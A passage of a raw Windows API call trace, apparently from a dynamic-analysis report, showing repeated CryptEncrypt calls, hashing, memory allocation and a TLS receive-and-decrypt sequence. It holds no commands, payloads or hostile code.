hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.065] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.066] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.066] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.066] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.066] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.066] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.066] malloc (_Size=0x1fd) returned 0x3691270 [0152.066] free (_Block=0x0) [0152.066] free (_Block=0x3def618) [0152.066] malloc (_Size=0x1fd) returned 0x3def618 [0152.066] free (_Block=0x0) [0152.066] CryptDuplicateHash (in: hHash=0x4329b8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0152.066] CryptHashData (hHash=0x3e10d8, pbData=0x3def618, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0152.066] malloc (_Size=0x14) returned 0x3f65280 [0152.066] free (_Block=0x0) [0152.066] CryptGetHashParam (in: hHash=0x3e10d8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfacc) returned 1 [0152.066] CryptHashData (hHash=0x4329b8, pbData=0x3def618, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0152.066] free (_Block=0x3f65280) [0152.066] CryptDestroyHash (hHash=0x3e10d8) returned 1 [0152.066] free (_Block=0x3def618) [0152.066] free (_Block=0x3d81e60) [0152.067] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.067] free (_Block=0x0) [0152.067] malloc (_Size=0x4) returned 0x3f4c048 [0152.067] free (_Block=0x0) [0152.067] malloc (_Size=0x4) returned 0x3f4bfb8 [0152.067] free (_Block=0x0) [0152.067] free (_Block=0x0) [0152.067] free (_Block=0x3f4c048) [0152.067] free (_Block=0x3f4bfb8) [0152.067] free (_Block=0x3d81e60) [0152.067] free (_Block=0x3691270) [0152.067] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0152.067] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0152.330] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0152.330] malloc (_Size=0x1fd) returned 0x3691270 [0152.330] free (_Block=0x0) [0152.330] malloc (_Size=0x1fd) returned 0x3df00e0 [0152.330] free (_Block=0x0) [0152.330] free (_Block=0x0) [0152.330] free (_Block=0x3691270) [0152.330] malloc (_Size=0x1fd) returned 0x3691270 [0152.331] free (_Block=0x0) [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.331] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.332] malloc (_Size=0x1fd) returned 0x3def010 [0152.332] free (_Block=0x0) [0152.332] free (_Block=0x3df00e0) [0152.332] free (_Block=0x3691270) [0152.332] malloc (_Size=0x1fd) returned 0x3691270 [0152.332] free (_Block=0x0) [0152.332] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.333] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] malloc (_Size=0x1fd) returned 0x3df00e0 [0152.334] free (_Block=0x0) [0152.334] free (_Block=0x3def010) [0152.334] free (_Block=0x3691270) [0152.334] malloc (_Size=0x1fd) returned 0x3691270 [0152.334] free (_Block=0x0) [0152.334] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.334] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.335] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, 